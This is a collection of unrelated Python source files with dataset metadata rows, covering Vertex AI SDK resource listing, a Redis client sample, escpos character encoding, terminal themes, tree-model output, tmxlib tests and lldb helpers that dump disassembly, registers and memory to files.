a bool. If the function returns False, that resource will be
excluded from the returned list. Example usage:
cls_filter = lambda obj: obj.metadata in cls.valid_metadatas
filter (str):
Optional. An expression for filtering the results of the request.
For field names both snake_case and camelCase are supported.
order_by (str):
Optional. A comma-separated list of fields to order by, sorted in
ascending order. Use "desc" after a field name for descending.
Supported fields: `display_name`, `create_time`, `update_time`
project (str):
Optional. Project to retrieve list from. If not set, project
set in aiplatform.init will be used.
location (str):
Optional. Location to retrieve list from. If not set, location
set in aiplatform.init will be used.
credentials (auth_credentials.Credentials):
Optional. Custom credentials to use to retrieve list. Overrides
credentials set in aiplatform.init.
parent (str):
Optional. The parent resource name if any to retrieve resource list from.
Returns:
List[VertexAiResourceNoun] - A list of SDK resource objects
"""
resource = cls._empty_constructor(
project=project, location=location, credentials=credentials
)
# Fetch credentials once and re-use for all `_empty_constructor()` calls
creds = resource.credentials
resource_list_method = getattr(resource.api_client, resource._list_method)
list_request = {
"parent": parent
or initializer.global_config.common_location_path(
project=project, location=location
),
"filter": filter,
}
if order_by:
list_request["order_by"] = order_by
resource_list = resource_list_method(request=list_request) or []
return [
cls._construct_sdk_resource_from_gapic(
gapic_resource, project=project, location=location, credentials=creds
)
for gapic_resource in resource_list
if cls_filter(gapic_resource)
]
@classmethod
def _list_with_local_order(
cls,
cls_filter: Callable[[proto.Message], bool] = lambda _: True,
filter: Optional[str] = None,
order_by: Optional[str] = None,
project: Optional[str] = None,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
) -> List[VertexAiResourceNoun]:
"""Private method to list all instances of this Vertex AI Resource,
takes a `cls_filter` arg to filter to a particular SDK resource
subclass. Provides client-side sorting when a list API doesn't support
`order_by`.
Args:
cls_filter (Callable[[proto.Message], bool]):
A function that takes one argument, a GAPIC resource, and returns
a bool. If the function returns False, that resource will be
excluded from the returned list. Example usage:
cls_filter = lambda obj: obj.metadata in cls.valid_metadatas
filter (str):
Optional. An expression for filtering the results of the request.
For field names both snake_case and camelCase are supported.
order_by (str):
Optional. A comma-separated list of fields to order by, sorted in
ascending order. Use "desc" after a field name for descending.
Supported fields: `display_name`, `create_time`, `update_time`
project (str):
Optional. Project to retrieve list from. If not set, project
set in aiplatform.init will be used.
location (str):
Optional. Location to retrieve list from. If not set, location
set in aiplatform.init will be used.
credentials (auth_credentials.Credentials):
Optional. Custom credentials to use to retrieve list. Overrides
credentials set in aiplatform.init.
Returns:
List[VertexAiResourceNoun] - A list of SDK resource objects
"""
li = cls._list(
cls_filter=cls_filter,
filter=filter,
order_by=None, # This method will handle the ordering locally
project=project,
location=location,
credentials=credentials,
)
if order_by:
desc = "desc" in order_by
order_by = order_by.replace("desc", "")
order_by = order_by.split(",")
li.sort(
key=lambda x: tuple(getattr(x, field.strip()) for field in order_by),
reverse=desc,
)
return li
@classmethod
def list(
cls,
filter: Optional[str] = None,
order_by: Optional[str] = None,
project: Optional[str] = None,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
parent: Optional[str] = None,
) -> List[VertexAiResourceNoun]:
"""List all instances of this Vertex AI Resource.
Example Usage:
aiplatform.BatchPredictionJobs.list(
filter='state="JOB_STATE_SUCCEEDED" AND display_name="my_job"',
)
aiplatform.Model.list(order_by="create_time desc, display_name")
Args:
filter (str):
Optional. An expression for filtering the results of the request.
For field names both snake_case and camelCase are supported.
order_by (str):
Optional. A comma-separated list of fields to order by, sorted in
ascending order. Use "desc" after a field name for descending.
Supported fields: `display_name`, `create_time`, `update_time`
project (str):
Optional. Project to retrieve list from. If not set, project
set in aiplatform.init will be used.
location (str):
Optional. Location to retrieve list from. If not set, location
set in aiplatform.init will be used.
credentials (auth_credentials.Credentials):
Optional. Custom credentials to use to retrieve list. Overrides
credentials set in aiplatform.init.
parent (str):
Optional. The parent resource name if any to retrieve list from.
Returns:
List[VertexAiResourceNoun] - A list of SDK resource objects
"""
return cls._list(
filter=filter,
order_by=order_by,
project=project,
location=location,
credentials=credentials,
parent=parent,
)
@optional_sync()
def delete(self, sync: bool = True) -> None:
"""Deletes this Vertex AI resource. WARNING: This deletion is
permanent.
Args:
sync (bool):
Whether to execute this deletion synchronously. If False, this method
will be executed in concurrent Future and any downstream object will
be immediately returned and synced when the Future has completed.
"""
_LOGGER.log_action_start_against_resource("Deleting", "", self)
lro = getattr(self.api_client, self._delete_method)(name=self.resource_name)
_LOGGER.log_action_started_against_resource_with_lro(
"Delete", "", self.__class__, lro
)
lro.result()
_LOGGER.log_action_completed_against_resource("deleted.", "", self)
def __repr__(self) -> str:
if self._gca_resource and self._resource_is_available:
return VertexAiResourceNoun.__repr__(self)
return FutureManager.__repr__(self)
def _wait_for_resource_creation(self) -> None:
"""Wait until underlying resource is created.
Currently this should only be used on subclasses that implement the construct then
`run` pattern because the underlying sync=False implementation will not update
downstream resource noun object's _gca_resource until the entire invoked method is complete.
Ex:
job = CustomTrainingJob()
job.run(sync=False, ...)
job._wait_for_resource_creation()
Raises:
RuntimeError: If the resource has not been scheduled to be created.
"""
# If the user calls this but didn't actually invoke an API to create
if self._are_futures_done() and not getattr(self._gca_resource, "name", None):
self._raise_future_exception()
raise RuntimeError(
f"{self.__class__.__name__} resource is not scheduled to be created."
)
while not getattr(self._gca_resource, "name", None):
# breaks out of loop if creation has failed async
if self._are_futures_done() and not getattr(
self._gca_resource, "name", None
):
self._raise_future_exception()
time.sleep(1)
def _assert_gca_resource_is_available(self) -> None:
"""Helper method to raise when accessing properties that do not exist.
Overrides VertexAiResourceNoun to provide a more informative exception if
resource creation has failed asynchronously.
Raises:
RuntimeError: When resource has not been created.
"""
if not getattr(self._gca_resource, "name", None):
raise RuntimeError(
f"{self.__class__.__name__} resource has not been created."
+ (
f" Resource failed with: {self._exception}"
if self._exception
else ""
)
)
def get_annotation_class(annotation: type) -> type:
"""Helper method to retrieve type annotation.
Args:
annotation (type): Type hint
"""
# typing.Optional
if getattr(annotation, "__origin__", None) is Union:
return annotation.__args__[0]
else:
return annotation
class DoneMixin(abc.ABC):
"""An abstract class for implementing a done method, indicating
whether a job has completed.
"""
@abc.abstractmethod
def done(self) -> bool:
"""Method indicating whether a job has completed."""
pass
class StatefulResource(DoneMixin):
"""Extends DoneMixin to check whether a job returning a stateful resource has compted."""
@property
@abc.abstractmethod
def state(self):
"""The current state of the job."""
pass
@property
@classmethod
@abc.abstractmethod
def _valid_done_states(cls):
"""A set() containing all job states associated with a completed job."""
pass
def done(self) -> bool:
"""Method indicating whether a job has completed.
Returns:
True if the job has completed.
"""
if self.state in self._valid_done_states:
return True
else:
return False
class VertexAiStatefulResource(VertexAiResourceNounWithFutureManager, StatefulResource):
"""Extends StatefulResource to include a check for self._gca_resource."""
def done(self) -> bool:
"""Method indicating whether a job has completed.
Returns:
True if the job has completed.
"""
if self._gca_resource and self._gca_resource.name:
return super().done()
else:
return False
| 36.435897 | 119 | 0.620946 |
ace8e8bcb8dee4ce0aaedf2d3b0bac705ea45f57 | 1,497 | py | Python | tests/integration/goldens/redis/samples/generated_samples/redis_generated_redis_v1_cloud_redis_delete_instance_sync.py | LaudateCorpus1/gapic-generator-python | 4f4ad394374326a74ceefd2c37c54e228d74ba8d | [
"Apache-2.0"
] | null | null | null | tests/integration/goldens/redis/samples/generated_samples/redis_generated_redis_v1_cloud_redis_delete_instance_sync.py | LaudateCorpus1/gapic-generator-python | 4f4ad394374326a74ceefd2c37c54e228d74ba8d | [
"Apache-2.0"
] | null | null | null | tests/integration/goldens/redis/samples/generated_samples/redis_generated_redis_v1_cloud_redis_delete_instance_sync.py | LaudateCorpus1/gapic-generator-python | 4f4ad394374326a74ceefd2c37c54e228d74ba8d | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DeleteInstance
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-redis
# [START redis_generated_redis_v1_CloudRedis_DeleteInstance_sync]
from google.cloud import redis_v1
def sample_delete_instance():
# Create a client
client = redis_v1.CloudRedisClient()
# Initialize request argument(s)
request = redis_v1.DeleteInstanceRequest(
name="name_value",
)
# Make the request
operation = client.delete_instance(request=request)
print("Waiting for operation to complete...")
response = operation.result()
print(response)
# [END redis_generated_redis_v1_CloudRedis_DeleteInstance_sync]
| 31.1875 | 85 | 0.754175 |
ace8e8e0678408016867b9b19a5f87836e007d8c | 1,197 | py | Python | get_challenge.py | z-Wind/Python_Challenge | be91ed491be57a1b9bf4b6d6bcb8ca23f48ef81b | [
"MIT"
] | null | null | null | get_challenge.py | z-Wind/Python_Challenge | be91ed491be57a1b9bf4b6d6bcb8ca23f48ef81b | [
"MIT"
] | null | null | null | get_challenge.py | z-Wind/Python_Challenge | be91ed491be57a1b9bf4b6d6bcb8ca23f48ef81b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""docstring with a description"""
__author__ = "ๅญ้ขจ"
__copyright__ = "Copyright 2015, Sun All rights reserved"
__version__ = "1.0.0"
import urllib.request
from io import BytesIO
def opener(username, password):
# User Name & Password
password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
top_level_url = 'http://www.pythonchallenge.com/'
password_mgr.add_password(None, top_level_url, username, password)
handler = urllib.request.HTTPBasicAuthHandler(password_mgr)
# Proxy setting
proxy = urllib.request.getproxies()
proxy_support = urllib.request.ProxyHandler({'sock5': proxy.get('http')})
# opener setting
return urllib.request.build_opener(proxy_support, handler)
def download(url, username, password):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0",
"Accept-Language": "zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3",
}
req = urllib.request.Request(url, headers=headers)
bros = opener(username, password)
data = BytesIO(bros.open(req).read())
bros.close()
return data
| 29.925 | 91 | 0.670844 |
ace8e93def8c58b67790d0c4e8fee9f582f1dac4 | 3,371 | py | Python | Lib/site-packages/pip/_vendor/rich/terminal_theme.py | edupyter/EDUPYTER38 | 396183cea72987506f1ef647c0272a2577c56218 | [
"bzip2-1.0.6"
] | 1 | 2022-02-25T13:46:54.000Z | 2022-02-25T13:46:54.000Z | Lib/site-packages/pip/_vendor/rich/terminal_theme.py | edupyter/EDUPYTER38 | 396183cea72987506f1ef647c0272a2577c56218 | [
"bzip2-1.0.6"
] | 1 | 2022-01-27T19:09:25.000Z | 2022-01-27T19:09:25.000Z | Lib/site-packages/pip/_vendor/rich/terminal_theme.py | edupyter/EDUPYTER38 | 396183cea72987506f1ef647c0272a2577c56218 | [
"bzip2-1.0.6"
] | 1 | 2021-09-27T11:14:58.000Z | 2021-09-27T11:14:58.000Z | from typing import List, Optional, Tuple
from .color_triplet import ColorTriplet
from .palette import Palette
_ColorTuple = Tuple[int, int, int]
class TerminalTheme:
"""A color theme used when exporting console content.
Args:
background (Tuple[int, int, int]): The background color.
foreground (Tuple[int, int, int]): The foreground (text) color.
normal (List[Tuple[int, int, int]]): A list of 8 normal intensity colors.
bright (List[Tuple[int, int, int]], optional): A list of 8 bright colors, or None
to repeat normal intensity. Defaults to None.
"""
def __init__(
self,
background: _ColorTuple,
foreground: _ColorTuple,
normal: List[_ColorTuple],
bright: Optional[List[_ColorTuple]] = None,
) -> None:
self.background_color = ColorTriplet(*background)
self.foreground_color = ColorTriplet(*foreground)
self.ansi_colors = Palette(normal + (bright or normal))
DEFAULT_TERMINAL_THEME = TerminalTheme(
(255, 255, 255),
(0, 0, 0),
[
(0, 0, 0),
(128, 0, 0),
(0, 128, 0),
(128, 128, 0),
(0, 0, 128),
(128, 0, 128),
(0, 128, 128),
(192, 192, 192),
],
[
(128, 128, 128),
(255, 0, 0),
(0, 255, 0),
(255, 255, 0),
(0, 0, 255),
(255, 0, 255),
(0, 255, 255),
(255, 255, 255),
],
)
SVG_EXPORT_THEME = TerminalTheme(
(12, 12, 12),
(242, 242, 242),
[
(12, 12, 12),
(205, 49, 49),
(13, 188, 121),
(229, 229, 16),
(36, 114, 200),
(188, 63, 188),
(17, 168, 205),
(229, 229, 229),
],
[
(102, 102, 102),
(241, 76, 76),
(35, 209, 139),
(245, 245, 67),
(59, 142, 234),
(214, 112, 214),
(41, 184, 219),
(229, 229, 229),
],
)
MONOKAI = TerminalTheme(
(12, 12, 12),
(217, 217, 217),
[
(26, 26, 26),
(244, 0, 95),
(152, 224, 36),
(253, 151, 31),
(157, 101, 255),
(244, 0, 95),
(88, 209, 235),
(196, 197, 181),
(98, 94, 76),
],
[
(244, 0, 95),
(152, 224, 36),
(224, 213, 97),
(157, 101, 255),
(244, 0, 95),
(88, 209, 235),
(246, 246, 239),
],
)
DIMMED_MONOKAI = TerminalTheme(
(25, 25, 25),
(185, 188, 186),
[
(58, 61, 67),
(190, 63, 72),
(135, 154, 59),
(197, 166, 53),
(79, 118, 161),
(133, 92, 141),
(87, 143, 164),
(185, 188, 186),
(136, 137, 135),
],
[
(251, 0, 31),
(15, 114, 47),
(196, 112, 51),
(24, 109, 227),
(251, 0, 103),
(46, 112, 109),
(253, 255, 185),
],
)
NIGHT_OWLISH = TerminalTheme(
(255, 255, 255),
(64, 63, 83),
[
(1, 22, 39),
(211, 66, 62),
(42, 162, 152),
(218, 170, 1),
(72, 118, 214),
(64, 63, 83),
(8, 145, 106),
(122, 129, 129),
(122, 129, 129),
],
[
(247, 110, 110),
(73, 208, 197),
(218, 194, 107),
(92, 167, 228),
(105, 112, 152),
(0, 201, 144),
(152, 159, 177),
],
)
| 21.88961 | 89 | 0.434589 |
ace8e9f238c65ad15827000043996c3d1790339a | 5,835 | py | Python | TreeOutputLib/OneTimestepOneFile/OneTimestepOneFile.py | jvollhueter/pyMANGA-1 | 414204a394d44405225b4b8224b19464c1006f1d | [
"MIT"
] | null | null | null | TreeOutputLib/OneTimestepOneFile/OneTimestepOneFile.py | jvollhueter/pyMANGA-1 | 414204a394d44405225b4b8224b19464c1006f1d | [
"MIT"
] | null | null | null | TreeOutputLib/OneTimestepOneFile/OneTimestepOneFile.py | jvollhueter/pyMANGA-1 | 414204a394d44405225b4b8224b19464c1006f1d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@date: 2018-Today
@author: jasper.bathmann@ufz.de
"""
from TreeOutputLib.TreeOutput import TreeOutput
import os
## Output class. This class creates one file per timestep at a defined
# location. A line containing time, position, desired geometric measures and
# desired parameters is written at every nth timestep.
class OneTimestepOneFile(TreeOutput):
## Constructor of dummy objects in order to drop output
# @param args xml element parsed from project to this constructor.
def __init__(self, args):
## Directory, where output is saved. Please make sure it exists and is
# empty.
self.output_dir = self.checkRequiredKey("output_dir", args)
## N-timesteps between two outputs
self.output_each_nth_timestep = int(
self.checkRequiredKey("output_each_nth_timestep", args))
## Geometric measures included in output
self.geometry_outputs = []
## Parameters included in output
self.parameter_outputs = []
## Parameters included in output
self.growth_outputs = []
## Counter for output generation
self._output_counter = 0
for key in args.iterchildren("geometry_output"):
self.geometry_outputs.append(key.text.strip())
for key in args.iterchildren("parameter_output"):
self.parameter_outputs.append(key.text.strip())
for key in args.iterchildren("growth_output"):
self.growth_outputs.append(key.text.strip())
try:
dir_files = len(os.listdir(self.output_dir))
except FileNotFoundError:
raise FileNotFoundError(
"[Errno 2] No such directory: '" + self.output_dir +
"' as defined in the project file." +
" Please make sure your output directory exists!")
if dir_files > 0:
raise ValueError("Output directory '" + self.output_dir +
"' is not empty.")
print(
"Output to '" + self.output_dir + "' of tree positions, the " +
"parameters ", self.parameter_outputs,
" and geometric" + " measures ", self.geometry_outputs,
" at every " + str(self.output_each_nth_timestep) +
" timesteps initialized.")
## Writes output to predefined folder
# For each timestep a file is created throughout the simulation.
# This function is only able to work, if the output directory exists and
# is empty at the begin of the model run
def writeOutput(self, tree_groups, time):
self._output_counter = (self._output_counter %
self.output_each_nth_timestep)
filename = ("Population_t_%012.1f" % (time) + ".csv")
file = open(self.output_dir + filename, "w")
string = ""
string += "tree,\t time,\t x,\t y"
for geometry_output in self.geometry_outputs:
string += ",\t" + geometry_output
for parameter_output in self.parameter_outputs:
string += ",\t" + parameter_output
for growth_output in self.growth_outputs:
string += ",\t" + growth_output
string += "\n"
file.write(string)
if self._output_counter == 0:
for group_name, tree_group in tree_groups.items():
for tree in tree_group.getTrees():
growth_information = tree.getGrowthConceptInformation()
string = ""
string += (group_name + "_" + "%09.0d" % (tree.getId()) +
",\t" + str(time) + ",\t" + str(tree.x) +
",\t" + str(tree.y))
if (len(self.geometry_outputs) > 0):
geometry = tree.getGeometry()
for geometry_output in self.geometry_outputs:
string += ",\t" + str(geometry[geometry_output])
if (len(self.parameter_outputs) > 0):
parameter = tree.getParameter()
for parameter_output in self.parameter_outputs:
string += ",\t" + str(parameter[parameter_output])
if (len(growth_information) > 0):
for growth_output_key in self.growth_outputs:
try:
string += ",\t" + str(
growth_information[growth_output_key])
except KeyError:
raise KeyError(
"Key " + growth_output_key +
" not available in growth concept!" +
" Please read growth concept documentation."
)
string += "\n"
file.write(string)
file.close()
self._output_counter += 1
## This function checks if a key exists and if its text content is empty.
# Raises key-errors, if the key is not properly defined.
# @param key Name of the key to be checked
# @param args args parsed from project. Xml-element
def checkRequiredKey(self, key, args):
tmp = args.find(key)
if tmp is None:
raise KeyError("Required key '" + key + "' in project file at " +
"position MangaProject__tree_output is missing.")
elif tmp.text.strip() == "":
raise KeyError("Key '" + key + "' in project file at position " +
"MangaProject__tree_output needs to be specified.")
return tmp.text
## This function returns the output directory
def getOutputDir(self):
return self.output_dir
| 47.439024 | 80 | 0.559554 |
ace8ea12a6607225be3bee0af7d953338a0dfe13 | 1,662 | py | Python | tmxlib_test/test_helpers.py | logicplace/pytmxlib | fe615974e0ea74a6201a392381cbffdfb925bcc2 | [
"MIT"
] | null | null | null | tmxlib_test/test_helpers.py | logicplace/pytmxlib | fe615974e0ea74a6201a392381cbffdfb925bcc2 | [
"MIT"
] | null | null | null | tmxlib_test/test_helpers.py | logicplace/pytmxlib | fe615974e0ea74a6201a392381cbffdfb925bcc2 | [
"MIT"
] | 1 | 2020-07-08T07:51:43.000Z | 2020-07-08T07:51:43.000Z |
from __future__ import division
import pytest
from tmxlib import helpers
def test_from_dict_method():
class Cls(object):
@helpers.from_dict_method
def from_dict_pop(self, dct, expected):
assert dct.pop('key') == expected
return dct.pop('rv')
@helpers.from_dict_method
def from_dict_nopop(self, dct, expected):
assert dct['key'] == expected
obj = Cls()
assert obj.from_dict_pop({'key': 1, 'rv': 2}, 1) == 2
with pytest.raises(ValueError):
obj.from_dict_nopop({'key': 1, 'rv': 2}, 1)
class NamedItem(str):
@property
def name(self):
return self.lower()
def test_named_elem_list():
lst = helpers.NamedElementList(NamedItem(x) for x in 'Abcda')
assert list(lst) == ['A', 'b', 'c', 'd', 'a']
assert lst[0] == 'A'
assert lst[1] == 'b'
assert lst[-1] == 'a'
assert lst['a'] == 'A'
assert lst['b'] == 'b'
assert lst['c'] == 'c'
with pytest.raises(IndexError):
lst[100]
with pytest.raises(IndexError):
lst[-100]
with pytest.raises(KeyError):
lst['z']
def test_empty_named_elem_list():
lst = helpers.NamedElementList()
assert list(lst) == []
with pytest.raises(IndexError):
lst[0]
with pytest.raises(KeyError):
lst['k']
def test_assert_item():
dct = {'key': 'value', 'key2': 'bad value'}
helpers.assert_item(dct, 'key', 'value')
assert list(dct.keys()) == ['key2']
with pytest.raises(KeyError):
helpers.assert_item(dct, 'key', 'value')
with pytest.raises(ValueError):
helpers.assert_item(dct, 'key2', 'good value')
| 25.569231 | 65 | 0.592659 |
ace8ea2b3d33af2b1dd3df34fdcbd333f4ec4bca | 10,809 | py | Python | src/escpos/magicencode.py | cohorte/python-escpos | 620cf97bbf411a4e0890f180adf62303a32852b5 | [
"MIT"
] | 683 | 2015-12-28T08:52:55.000Z | 2022-03-30T18:28:33.000Z | src/escpos/magicencode.py | cohorte/python-escpos | 620cf97bbf411a4e0890f180adf62303a32852b5 | [
"MIT"
] | 345 | 2015-12-23T20:56:12.000Z | 2022-03-06T19:48:28.000Z | src/escpos/magicencode.py | cohorte/python-escpos | 620cf97bbf411a4e0890f180adf62303a32852b5 | [
"MIT"
] | 243 | 2015-12-25T17:52:20.000Z | 2022-03-30T00:10:50.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
""" Magic Encode
This module tries to convert an UTF-8 string to an encoded string for the printer.
It uses trial and error in order to guess the right codepage.
The code is based on the encoding-code in py-xml-escpos by @fvdsn.
:author: `Patrick Kanzler <dev@pkanzler.de>`_
:organization: `python-escpos <https://github.com/python-escpos>`_
:copyright: Copyright (c) 2016 Patrick Kanzler and Frรฉdรฉric van der Essen
:license: MIT
"""
from builtins import bytes
from .constants import CODEPAGE_CHANGE
from .exceptions import Error
from .codepages import CodePages
import six
class Encoder(object):
"""Takes a list of available code spaces. Picks the right one for a
given character.
Note: To determine the code page, it needs to do the conversion, and
thus already knows what the final byte in the target encoding would
be. Nevertheless, the API of this class doesn't return the byte.
The caller use to do the character conversion itself.
$ python -m timeit -s "{u'รถ':'a'}.get(u'รถ')"
100000000 loops, best of 3: 0.0133 usec per loop
$ python -m timeit -s "u'รถ'.encode('latin1')"
100000000 loops, best of 3: 0.0141 usec per loop
"""
def __init__(self, codepage_map):
self.codepages = codepage_map
self.available_encodings = set(codepage_map.keys())
self.available_characters = {}
self.used_encodings = set()
def get_sequence(self, encoding):
return int(self.codepages[encoding])
def get_encoding_name(self, encoding):
"""Given an encoding provided by the user, will return a
canonical encoding name; and also validate that the encoding
is supported.
TODO: Support encoding aliases: pc437 instead of cp437.
"""
encoding = CodePages.get_encoding_name(encoding)
if encoding not in self.codepages:
raise ValueError((
'Encoding "{}" cannot be used for the current profile. '
'Valid encodings are: {}'
).format(encoding, ','.join(self.codepages.keys())))
return encoding
@staticmethod
def _get_codepage_char_list(encoding):
"""Get codepage character list
Gets characters 128-255 for a given code page, as an array.
:param encoding: The name of the encoding. This must appear in the CodePage list
"""
codepage = CodePages.get_encoding(encoding)
if 'data' in codepage:
encodable_chars = list("".join(codepage['data']))
assert(len(encodable_chars) == 128)
return encodable_chars
elif 'python_encode' in codepage:
encodable_chars = [u" "] * 128
for i in range(0, 128):
codepoint = i + 128
try:
encodable_chars[i] = bytes([codepoint]).decode(codepage['python_encode'])
except UnicodeDecodeError:
# Non-encodable character, just skip it
pass
return encodable_chars
raise LookupError("Can't find a known encoding for {}".format(encoding))
def _get_codepage_char_map(self, encoding):
""" Get codepage character map
Process an encoding and return a map of UTF-characters to code points
in this encoding.
This is generated once only, and returned from a cache.
:param encoding: The name of the encoding.
"""
# Skip things that were loaded previously
if encoding in self.available_characters:
return self.available_characters[encoding]
codepage_char_list = self._get_codepage_char_list(encoding)
codepage_char_map = dict((utf8, i + 128) for (i, utf8) in enumerate(codepage_char_list))
self.available_characters[encoding] = codepage_char_map
return codepage_char_map
def can_encode(self, encoding, char):
"""Determine if a character is encodeable in the given code page.
:param encoding: The name of the encoding.
:param char: The character to attempt to encode.
"""
available_map = {}
try:
available_map = self._get_codepage_char_map(encoding)
except LookupError:
return False
# Decide whether this character is encodeable in this code page
is_ascii = ord(char) < 128
is_encodable = char in available_map
return is_ascii or is_encodable
@staticmethod
def _encode_char(char, charmap, defaultchar):
""" Encode a single character with the given encoding map
:param char: char to encode
:param charmap: dictionary for mapping characters in this code page
"""
if ord(char) < 128:
return ord(char)
if char in charmap:
return charmap[char]
return ord(defaultchar)
def encode(self, text, encoding, defaultchar='?'):
""" Encode text under the given encoding
:param text: Text to encode
:param encoding: Encoding name to use (must be defined in capabilities)
:param defaultchar: Fallback for non-encodable characters
"""
codepage_char_map = self._get_codepage_char_map(encoding)
output_bytes = bytes([self._encode_char(char, codepage_char_map, defaultchar) for char in text])
return output_bytes
def __encoding_sort_func(self, item):
key, index = item
return (
key in self.used_encodings,
index
)
def find_suitable_encoding(self, char):
"""The order of our search is a specific one:
1. code pages that we already tried before; there is a good
chance they might work again, reducing the search space,
and by re-using already used encodings we might also
reduce the number of codepage change instructiosn we have
to send. Still, any performance gains will presumably be
fairly minor.
2. code pages in lower ESCPOS slots first. Presumably, they
are more likely to be supported, so if a printer profile
is missing or incomplete, we might increase our change
that the code page we pick for this character is actually
supported.
"""
sorted_encodings = sorted(
self.codepages.items(),
key=self.__encoding_sort_func)
for encoding, _ in sorted_encodings:
if self.can_encode(encoding, char):
# This encoding worked; at it to the set of used ones.
self.used_encodings.add(encoding)
return encoding
def split_writable_text(encoder, text, encoding):
"""Splits off as many characters from the begnning of text as
are writable with "encoding". Returns a 2-tuple (writable, rest).
"""
if not encoding:
return None, text
for idx, char in enumerate(text):
if encoder.can_encode(encoding, char):
continue
return text[:idx], text[idx:]
return text, None
class MagicEncode(object):
"""A helper that helps us to automatically switch to the right
code page to encode any given Unicode character.
This will consider the printers supported codepages, according
to the printer profile, and if a character cannot be encoded
with the current profile, it will attempt to find a suitable one.
If the printer does not support a suitable code page, it can
insert an error character.
"""
def __init__(self, driver, encoding=None, disabled=False,
defaultsymbol='?', encoder=None):
"""
:param driver:
:param encoding: If you know the current encoding of the printer
when initializing this class, set it here. If the current
encoding is unknown, the first character emitted will be a
codepage switch.
:param disabled:
:param defaultsymbol:
:param encoder:
"""
if disabled and not encoding:
raise Error('If you disable magic encode, you need to define an encoding!')
self.driver = driver
self.encoder = encoder or Encoder(driver.profile.get_code_pages())
self.encoding = self.encoder.get_encoding_name(encoding) if encoding else None
self.defaultsymbol = defaultsymbol
self.disabled = disabled
def force_encoding(self, encoding):
"""Sets a fixed encoding. The change is emitted right away.
From now one, this buffer will switch the code page anymore.
However, it will still keep track of the current code page.
"""
if not encoding:
self.disabled = False
else:
self.write_with_encoding(encoding, None)
self.disabled = True
def write(self, text):
"""Write the text, automatically switching encodings.
"""
if self.disabled:
self.write_with_encoding(self.encoding, text)
return
# See how far we can go into the text with the current encoding
to_write, text = split_writable_text(self.encoder, text, self.encoding)
if to_write:
self.write_with_encoding(self.encoding, to_write)
while text:
# See if any of the code pages that the printer profile
# supports can encode this character.
encoding = self.encoder.find_suitable_encoding(text[0])
if not encoding:
self._handle_character_failed(text[0])
text = text[1:]
continue
# Write as much text as possible with the encoding found.
to_write, text = split_writable_text(self.encoder, text, encoding)
if to_write:
self.write_with_encoding(encoding, to_write)
def _handle_character_failed(self, char):
"""Called when no codepage was found to render a character.
"""
# Writing the default symbol via write() allows us to avoid
# unnecesary codepage switches.
self.write(self.defaultsymbol)
def write_with_encoding(self, encoding, text):
if text is not None and type(text) is not six.text_type:
raise Error("The supplied text has to be unicode, but is of type {type}.".format(
type=type(text)
))
# We always know the current code page; if the new codepage
# is different, emit a change command.
if encoding != self.encoding:
self.encoding = encoding
self.driver._raw(
CODEPAGE_CHANGE +
six.int2byte(self.encoder.get_sequence(encoding)))
if text:
self.driver._raw(self.encoder.encode(text, encoding))
| 36.890785 | 104 | 0.636414 |
ace8eb2dd7db355983230e8f6a72f67ac8db2f8f | 6,443 | py | Python | util/lldb_util.py | Dorllen/AssemMocker | cd85ffc4076cc9e82af159924758ab89da1d7e71 | [
"MIT"
] | null | null | null | util/lldb_util.py | Dorllen/AssemMocker | cd85ffc4076cc9e82af159924758ab89da1d7e71 | [
"MIT"
] | null | null | null | util/lldb_util.py | Dorllen/AssemMocker | cd85ffc4076cc9e82af159924758ab89da1d7e71 | [
"MIT"
] | null | null | null | import lldb
import re
base_save_path = None # "simple/dy/lldb_result"
assert base_save_path, "ๆ็คบ๏ผ่ฏท่ฎพ็ฝฎๆไปถไฟๅญ่ทฏๅพ"
max_loop = 2
def dump_function(debugger, command, result, internal_dict):
interpreter = lldb.debugger.GetCommandInterpreter()
return_object = lldb.SBCommandReturnObject() # ็จๆฅไฟๅญ็ปๆ
interpreter.HandleCommand('dis', return_object) # ๆง่กdisๅฝไปค
output = return_object.GetOutput() #่ทๅๅๆฑ็ผๅ็็ปๆ
result = re.findall("unnamed_(symbol.+\\$\\$[a-zA-z]+)", output)
command = command or result[0]
command = command.strip()
print("dump functions:", command)
file_path = f"{base_save_path}/lldb_func_{command}.txt"
with open(file_path, "w") as f:
f.write(output.replace("[33m", "").replace("[0m", ""))
print("save to:", file_path)
def dump_registers(debugger, command, result, internal_dict):
interpreter = lldb.debugger.GetCommandInterpreter()
return_object = lldb.SBCommandReturnObject() # ็จๆฅไฟๅญ็ปๆ
interpreter.HandleCommand('register read', return_object) # ๆง่กdisๅฝไปค
output = return_object.GetOutput() #่ทๅๅๆฑ็ผๅ็็ปๆ
print("dump registers")
file_path = f"{base_save_path}/lldb_registers.txt"
with open(file_path, "w") as f:
f.write(output)
print("save to:", file_path)
def dump_mems(debugger, command, result, internal_dict):
print("dump mems:", command)
if not command:
return
interpreter = lldb.debugger.GetCommandInterpreter()
return_object = lldb.SBCommandReturnObject() # ็จๆฅไฟๅญ็ปๆ
count = 4096
commands = command.strip().split(" ")
addr = commands[0]
if len(commands) > 1:
count = commands[1]
print(f'memory read -c {count} --force {addr}')
interpreter.HandleCommand(f'memory read -c {count} --force {addr}', return_object)
output = return_object.GetOutput()
file_path = f"{base_save_path}/lldb_mem_{addr}.txt"
with open(file_path, "w") as f:
f.write(output.encode("unicode_escape").decode().replace("\\n", "\n"))
print("save to:", file_path)
